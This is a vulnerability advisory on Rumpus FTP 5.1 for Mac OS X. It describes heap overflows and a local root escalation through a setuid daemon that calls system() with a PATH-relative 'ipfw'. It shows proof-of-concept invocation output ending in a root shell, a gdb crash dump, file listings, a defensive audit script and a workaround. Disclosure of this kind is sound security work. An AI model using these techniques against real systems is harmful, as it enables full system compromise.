
Summary

The following description is provided by the vendor (Maxum Development Corporation):

If you need to allow people from within your office or across the Internet to send, receive, and manage files on a central Mac, Rumpus FTP is what you are looking for. Rumpus is perfect for print, media or design shops, and is the answer to education and corporate file sharing needs. Rumpus FTP can handle virtually any Internet file transfer task by working with standard FTP and Web clients on any platform, and do it with remarkable ease.

rumpusd is vulnerable to several remotely exploitable heap-based buffer overflows, denial of service conditions and local privilege escalation issues. Because Rumpus runs with root privileges, successful exploitation by unprivileged users would allow a full compromise of the system.

Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of the system() function and incorrect permissions and/or handling of setuid binaries.

Affected versions

Rumpus 5.1 and previous versions on Mac OS X 10.4.8 (8L2127). Tested on both PowerPC and x86 based OS X.

Proof of concept, exploit or instructions to reproduce

The provided proof of concept can abuse one of the local privilege escalation issues and another (post-authentication) problem in the handling of the FTP LIST command.

$ ruby MOAB-18-01-2007.rb [selected issue]

example:
$ ruby bug-files/MOAB-18-01-2007.rb 1
++ Local privilege escalation...
++ Enjoy root shell...
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

Note: The local privilege escalation exploit doesn't replace any files on the filesystem.

Debugging information

The following debugging information shows the results of launching the proof of concept against the FTP service, and the permissions and other information related to Rumpus binaries.

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x33616263
[Switching to process 989 thread 0x3703]
0x00009fa5 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x33616263       862020195
ebx            0x100007f        16777343
esp            0xb060aa50       0xb060aa50
ebp            0xb060aa78       0xb060aa78
esi            0x0      0
edi            0x0      0
eip            0x9fa5   0x9fa5
eflags         0x10297  66199
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55

(gdb) x/i $eip
0x9fa5: mov    (%edx,%eax,4),%eax

(gdb) x/10x $ebp
0xb0c16a78:     0xb0c16eb8      0x0000f68f      0x33616263      0x72646972
0xb0c16a88:     0xb0c16ef8      0xb0c16ea4      0x00000000      0x00000000
0xb0c16a98:     0x00000000      0x00000000

(gdb) i f
Stack level 0, frame at 0xb0c16a54:
 eip = 0x9fa5; saved eip 0x0
 called by frame at 0x9f9e
 Arglist at 0xb0c16a4c, args: 
 Locals at 0xb0c16a4c, Previous frame's sp is 0xb0c16a54
 Saved registers:
  ebp at 0xb0c16a4c, eip at 0xb0c16a50

$ ls -l /usr/local/Rumpus/
total 1912
drwxr-xr-x    7 root  wheel     238 Jan 19 08:35 Logs
-rw-r--r--    1 root  wheel     790 Jan 19 00:38 Mac2Web.txt
-rw-r--r--    1 root  wheel    2144 Jan 17 14:51 Messages.txt
-rw-rw-rw-    1 root  wheel    3128 Jan 19 07:43 Rumpus.conf
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.fsets
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.notices
-rw-r--r--    1 root  wheel       3 Jan 19 08:50 Rumpus.pid
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.rips
-rw-r--r--    1 root  wheel    8112 Jan 19 00:38 Rumpus.strings
-rw-rw-rw-    1 root  wheel    1456 Jan 19 00:38 Rumpus.types
-rw-rw-rw-    1 root  wheel     200 Jan 19 07:45 Rumpus.users
-rw-r--r--    1 root  wheel      31 Jan 19 08:36 Rumpus.userstats
drwxrwxrwx   46 root  wheel    1564 Jan 19 00:38 WFMTemplates
-rw-r--r--    1 root  wheel     939 Jan 19 00:38 Web2Mac.txt
-rwsr-sr-x    1 root  wheel  934244 Jan 19 00:38 rumpusd

$ strings /usr/local/Rumpus/rumpusd | grep ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw

rumpusd makes the (old, yet still common) mistake of calling the system() function with a command name that is not an absolute path: the setuid-root daemon resolves `ipfw` through the caller's PATH instead of invoking /sbin/ipfw directly, and the same listing shows its configuration files are world-writable.
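The two conditions the listings above expose, world-writable configuration files beside a set-id root binary and a bare command name embedded in the daemon, can be checked on a host with the following audit script. It is an added example written for this page, not code from the advisory or from Rumpus; the install path defaults to the one shown in the advisory and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not part of the advisory): audit a Rumpus install directory
# for the conditions shown in the advisory's `ls -l` and `strings` output.

# List entries directly under $1 that are world-writable (o+w), like
# Rumpus.conf, Rumpus.users and WFMTemplates in the advisory listing.
# Symlinks are skipped because their mode is always 777.
find_world_writable() {
    find "$1" -mindepth 1 -maxdepth 1 -perm -0002 ! -type l | sort
}

# List regular files directly under $1 with the setuid or setgid bit set.
find_setid() {
    find "$1" -mindepth 1 -maxdepth 1 -type f \( -perm -4000 -o -perm -2000 \) | sort
}

# Print printable strings in binary $1 that start with the bare command
# name $2 (the advisory's `strings rumpusd | grep ipfw`). A hit means the
# program is named relative to PATH rather than by an absolute path.
relative_command_refs() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -E "^$2( |\$)" | sort -u
}

# Exit 0 when $1 holds both a set-id binary and a world-writable entry,
# the combination that turns config tampering into a root problem.
rumpus_risky_perms() {
    [ -n "$(find_setid "$1")" ] && [ -n "$(find_world_writable "$1")" ]
}

# Print a short report; $1 defaults to the advisory's install path.
audit_rumpus() {
    dir=${1:-/usr/local/Rumpus}
    echo "== world-writable entries in $dir"; find_world_writable "$dir"
    echo "== set-id binaries in $dir";        find_setid "$dir"
    if [ -f "$dir/rumpusd" ]; then
        echo "== bare command references in $dir/rumpusd"
        relative_command_refs "$dir/rumpusd" ipfw
    fi
    if rumpus_risky_perms "$dir"; then
        echo "RISK: world-writable files beside a set-id binary in $dir"
    fi
}

# Run the report only when invoked as rumpus_audit.sh, not when sourced.
case $0 in *rumpus_audit.sh) audit_rumpus "$@" ;; esac
```

Save it as rumpus_audit.sh and run it as any local user; the report needs no root and does not modify the install.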

Notes

Exploitation conditions

Rumpus local privilege escalation issues don't need admin group privileges for exploitation. FTP service flaws, mostly heap buffer overflows, require authentication first (e.g. anonymous access). HTTP service flaws can be abused without any type of authentication.

Workaround or temporary solution

To prevent exploitation of the remote issues, properly limit access to the Rumpus services from untrusted hosts until a patch is made available by the vendor. There is no workaround for some of the local privilege escalation issues, because they rely on misuse of the system() function and not just 'insecure' permissions (although patching the binary is feasible). Use an alternative file sharing method.